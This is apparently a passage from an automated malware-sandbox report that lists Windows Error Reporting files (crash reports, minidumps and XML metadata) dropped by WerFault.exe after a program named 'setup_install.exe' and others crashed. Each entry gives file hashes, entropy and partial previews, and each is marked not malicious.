                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.7.0.4.2.3.1.4.5.5.8.4.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.7.0.4.2.3.6.4.0.8.9.5.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.4.b.d.b.7.6.-.4.b.6.4.-.4.9.d.d.-.8.9.5.9.-.8.c.d.4.2.e.4.4.9.f.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.9.4.1.a.b.d.-.8.7.8.6.-.4.7.b.e.-.a.2.e.a.-.c.a.8.b.7.f.5.3.4.5.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.c.0.-.0.0.0.1.-.0.0.1.4.-.5.1.b.e.-.4.1.1.9.a.8.f.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.4.6.0.a.f.4.e.1.c.6.4.c.0.4.2.2.0.6.2.a.6.2.2.4.f.8.4.0.3.6.f.0.0.0.0.0.0.0.0.!.0.0.0.0.f.3.5.f.9.5.a.1.3.c.2.4.d.0.7.4.6.0.d.7.a.4.c.1.4.d.2.0.d.2.7.b.2.e.2.0.2.5.3.9.!.M.o.n.1.7.9.4.8.1.0.0.7.3.3.a.9.5.c.5.8...e.x.e.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.0291643952725706
                                      Encrypted:false
                                      SSDEEP:192:f74Mpdxc03XhYCejICB95zuiFIZ24IO8Kd:D4MpdxX3XhYCejIWzuiFIY4IO8Kd
                                      MD5:5A8B32B72BF815E72C3CC95CE4BD960F
                                      SHA1:68A15DB5B3C3DA90863CEDAA681B5442D4164ED2
                                      SHA-256:A52CD7D31A3D7E01FFF73BC9604CEB0CA735F85507B2D35CC9C5D05AFA54AC75
                                      SHA-512:BAC9332BA5BCF927D9039A0CEA13000544C4F7B4BB09C8013CAB94B06130FE35494FBAAB75FFE9DC8957B57E9786882867EF1DF5BD3AF4336B4FFA28EFB24632
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.8.7.0.4.2.2.6.9.1.2.0.8.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.8.7.0.4.2.3.2.3.3.3.9.7.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.5.8.b.5.0.a.f.-.e.5.b.6.-.4.6.7.e.-.a.b.0.c.-.7.9.2.c.c.b.0.2.0.7.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.c.9.1.d.f.8.-.4.4.d.8.-.4.8.9.6.-.9.f.1.7.-.7.2.7.9.8.d.4.1.a.f.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.e.t.u.p._.i.n.s.t.a.l.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.1.4.-.0.0.0.1.-.0.0.1.4.-.3.2.0.6.-.0.5.1.7.a.8.f.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.7.9.1.8.a.e.9.3.c.6.6.5.4.4.c.7.f.9.9.b.7.8.7.9.b.b.5.1.3.3.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.5.c.e.b.7.9.b.3.e.9.1.2.2.5.e.f.3.6.3.e.e.9.b.a.f.9.a.3.2.8.7.7.b.d.1.f.e.9.!.s.e.t.u.p._.i.n.s.t.a.l.l...e.x.e.....T.a.r.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 14 streams, Wed Aug 21 08:57:07 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):48560
                                      Entropy (8bit):2.366950899746436
                                      Encrypted:false
                                      SSDEEP:384:tPr+KU0ir4eAL3ejC0xy6ua8QuOzjmXvGSvRcb3/h/vrnxpXUAzkKQdN2c:8KVeAzejbxy65r35vrxpXpzkKQdNf
                                      MD5:59D1C14D643DD4C6CC9997C927D2DCEC
                                      SHA1:FDC251B1C6772AFC58AC39F1F2EB616371178BC3
                                      SHA-256:FB2CF081B9400DDBACC4C6AB7913F0C48C617D394763E553A3B76B95EA99CCBC
                                      SHA-512:7D9757A42A68B107A1ECC6275B4023E38D818705B9662B190921A466E07212E47BF380CFB54317CF1420DC0570DB2E2E5C1778FC72EA54AEC7227A4E508971C7
                                      Malicious:false
                                      Preview:MDMP..a..... .........f........................|...........4...Z4..........T.......8...........T............&............... ..........."..............................................................................eJ......."......GenuineIntel............T.............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.692558028353917
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJA465bJot6Ymm6vOgmf0GfprT89bXssfw9m:R6lXJP6546Y36vOgmf0GGX/fX
                                      MD5:7BD97E7F2225B273066B96BAD7B7BD2E
                                      SHA1:FD41BF24E54968C8DAD8050B13639DF2A2DA3D7E
                                      SHA-256:A39D5ECF20489A6369305257531ACFB196356FCE0B3E39FC6F6B08F3B1688234
                                      SHA-512:8ECE7A3D31FB2C85C0444EA8A4957DF3BD608AD2C6FA719E44ADC3C589D60660A6409AD888F12CAA6F990390578543533F2B093B392EC3EE9AA80C517935773C
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.0.0.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4605
                                      Entropy (8bit):4.4589916049360445
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VYDYm8M4JaIacIiFi+q88ILIfTzNQu6Wd:uIjfQHI7Sm7VzJyPzNQu6Wd
                                      MD5:98F055181D9AD53249B3685A04A8A249
                                      SHA1:40B67F9EB8F9F14E6D86269602BF6848AF05DABE
                                      SHA-256:B1783A87A3A32A7705B6C632CB298FC30DA34F53AE79EF05BFA737DC7FF3CD47
                                      SHA-512:EF3596B5DFCA5A831214A5FB2EF7C2C4FADC9F661D4F4DFCECA1285E16E2FE4A1A3A148DFDF646A8B3CD500AB230008A84A49EAA1317DC33E29EC908F730F1C6
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6284
                                      Entropy (8bit):3.697067739092112
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbObM68UYR+V0wH5aMeUqx89bTAsfqrRm:R6l7wVeJCM68UYU3px489bTAsf2Rm
                                      MD5:DCE5E2FBCE73431CE785345773EC037C
                                      SHA1:E6FAF924821CB0AF8706D38ACC058EC1EC4370CB
                                      SHA-256:D4C17AE3755839DB474DECA82553863E3B414A15981B9CBA79C864B515ED3934
                                      SHA-512:A84090C2EFB2D2D30F3506D6A713869C3CA7AF73338DC93EA68D3759B204E3613B6937621D8B318E4CFC9167E89BE5056A342F909BA24389919CF7D10F2DB5D9
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.4.4.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4598
                                      Entropy (8bit):4.446248502287888
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VY5vYm8M4JTHFtyj+q875eQe31N9d:uIjfQHI7Sm7VtJGlb31N9d
                                      MD5:A41DEAB351E79F364608A8CAAB9ECE16
                                      SHA1:BBC5049175C592E42EA1809740CE445661012865
                                      SHA-256:55314F63136CACFA93807CEF10B06BB3E7152E2CCE3047CEACCEF2DF66C7ED8F
                                      SHA-512:1DB0A614744B1973C9FC501AC4B803DE16D3E8D86B51B2E49F824512FDE9C701E79432730547BBFA1CE8F633EB2A76836180E623FCC709A777496F46F405C23C
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:17 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):77338
                                      Entropy (8bit):2.3739588497132575
                                      Encrypted:false
                                      SSDEEP:384:0wEa5CS2KL3g3X06escsLBWSMjfa7M99ZI98rwcq:0Ej2Kzg3X0vqLBWSqSw9G
                                      MD5:F3DCB79259050EB1D55A8FBC29D6DA88
                                      SHA1:04C3C5DF1F9F42575F2A0806EDEC21717F11A780
                                      SHA-256:6630AD1C5D775A8A326B5C38C78ED89DD9A9AF283FACE991A822F6DBF35EAA5C
                                      SHA-512:57D5720EBC02FDB00D0D07C3F69B0C6A57AF9C12B339D654AFD31823305893171FAF4162F62E1C252DB887B189CA240D59A0B266B334FE11195DED303E6FC984
                                      Malicious:false
                                      Preview:MDMP..a..... .........f........................8...........$...@.......4....8..........`.......8...........T...........H"..............d...........P!..............................................................................eJ.......!......GenuineIntel............T.............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.6971367970579476
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtW6IN16Y196aggmfKXpBu89bhKsfbQxrm:R6lXJs6IN16Y/6aggmfKvhpfbQg
                                      MD5:BA8F009A0E7D55C513A3B5B32699F007
                                      SHA1:21E91FC2EB97C410D94F11DFAA87162A64941173
                                      SHA-256:E7328306A4AC43F6195F3A2D6DA31175D86F7DAA66CF6C093422A783B90EE1A9
                                      SHA-512:7B2CC8B5BCF7E97EBE0CE5E674E3222641B182DF39569D31EC7F59A7F7DFCB010AADC71D49728992CC319A9E8564195DDF0275033E140665A5F20DF4E146863B
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.467411103789839
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsQtJg77aI90XWpW8VYCYm8M4JIs8N6Fmx+q8M7Pl1ABHHd:uIjfQHI7Sm7VWJazxX1OHHd
                                      MD5:513B56A2A5BC20C727466C8706778DD0
                                      SHA1:6FE4B54233C697E4B97215807AF0B41218574257
                                      SHA-256:8EA47C26545785DDB32E3983D3B0FC0F4C16E0D5BA30DAA320C987F93703CB64
                                      SHA-512:FE2C39883FE29ED56915A263CDBEA7B8A07E96C77C45B400A2A6817F8C13A53928F719F4B254323CA903C001E206D03A171AAA9EF6BB855CC4DB25A5DC1C0D6A
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:19 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):82934
                                      Entropy (8bit):2.312529261747667
                                      Encrypted:false
                                      SSDEEP:384:MUbCSyjhOpvL3geam6ECsK1wNLBWSMjfa7M29oIk+2rNRlE4:MU+ROpvzgeamnCNULBWSqSL9kPl
                                      MD5:D7172FD3D0B77F52B39D5CE120367F61
                                      SHA1:541F692523AD8FEBEF28AD0E2C66C7223AB0E0B2
                                      SHA-256:FA881E239FF572C467C3E09E583EBF6E274A37596330EE3B451AC66D27901357
                                      SHA-512:410BE99E46AB59A389C64788F5ECF17763590EFD2DCA988C9AD5164AC59977945F15F12A1F7E0B99851A81E51565F646AB8D2E0D0107DCD1645963CBAF96B3DF
                                      Malicious:false
                                      Preview:MDMP..a..... .........f............$...........8...8.......$...p............;..........`.......8...........T...........p"...!.......................!..............................................................................eJ......."......GenuineIntel............T.............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.695738121153532
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtV6IXp1B6Y1I6aggmfKXpBB89b/KsfqG1m:R6lXJf6I51B6Yq6aggmfKG/pfqV
                                      MD5:D70F0020ABBD8A4771B168FF9E35B30C
                                      SHA1:AE6D2101446CB55F7EA48ADC3776F790B6BF420B
                                      SHA-256:1552656BD470E61586127847D312DCA005B7902807C5566B098972995662E59B
                                      SHA-512:C038797718305628A11CCD0BE97A7F57E51D35DC349B6A796D5A6CC56161958E6A48E560431BB2A5DD5DAE2008C69A70FA4E4357718AB4D4BD701A961458736E
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4607
                                      Entropy (8bit):4.4694407185226925
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsAJg77aI90XWpW8VY7Ym8M4JIs8N6Fmz+q8M7Pl1ABHHd:uIjfGI7Sm7V/JafzX1OHHd
                                      MD5:A942C56B799208EC7D604536D1F798A0
                                      SHA1:F32EAEE7ABBFED78B39A9AE3FFD1CAE0CE4E662B
                                      SHA-256:47BEF3AF0ACD839E2C13EB7E5F6AEE1FAA6EE86C809757A4668C5AAA8C93B0B6
                                      SHA-512:B710175806980FDD957A575792A4284E1BBEDBE2C26116E81CEFB9A4A7FA871720E957414392CE51F4F90102C866D81523979B10E9FFB1040B6D85B5A0F1C7DA
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="465120" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Mini DuMP crash report, 15 streams, Wed Aug 21 08:57:21 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):96214
                                      Entropy (8bit):2.374965459724901
                                      Encrypted:false
                                      SSDEEP:384:PydiilO9jL3gBPm6HsDBbPMesDUcMyprEWSMjfa7Mf9nIVSS8aYyDo8BCZoiJGMl:PKBO9jzgBPm20BTM13DEWSqSi9iiJGn
                                      MD5:32F2CD22C1CA0124912B6FD44518BD1B
                                      SHA1:859A77B50C0B6868B35ECBB66DD9375BC2D1E0CC
                                      SHA-256:06C12DCA1C2025EDC23F0055F8F6AD290ED41B99E9AEA8C33691C34E7AB3A56F
                                      SHA-512:199205452094184D1CF1A099D67A9F0D5AD22A5EF1B1C18E28F33BFE18243DAEA2466CA68AE485849C6D5BE5F7D797992C3283E701E96675B2A8FCC36B9DB0A1
                                      Malicious:false
                                      Preview:MDMP..a..... .........f............T...........8...h.......$...........t....>..........`.......8...........T...........8(...O.......................!..............................................................................eJ......H"......GenuineIntel............T.............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8318
                                      Entropy (8bit):3.6944309875781562
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJtL67T6Y1+6aggmfKXpBu89b0Ksf88m:R6lXJh6v6Y86aggmfKv0pf+
                                      MD5:3DE69C39D729CD396209D60420A6F91A
                                      SHA1:0CB858C1771AEB3F98C7F678AB88E28CBC3E9D42
                                      SHA-256:4290728E6BB77338F711C76FA5489C5000AC9B3D7ED06470D13B8CB48ABBA77B
                                      SHA-512:7ACF959AA786C7579ED3BFA2C4C98DC7D2CC1D1939F3BE247D879E4A5E1D4E79266E44A31E7207CF9F1060E3F94CA81D225A70B9CCB689F68BAB96E22611AE73
                                      Malicious:false
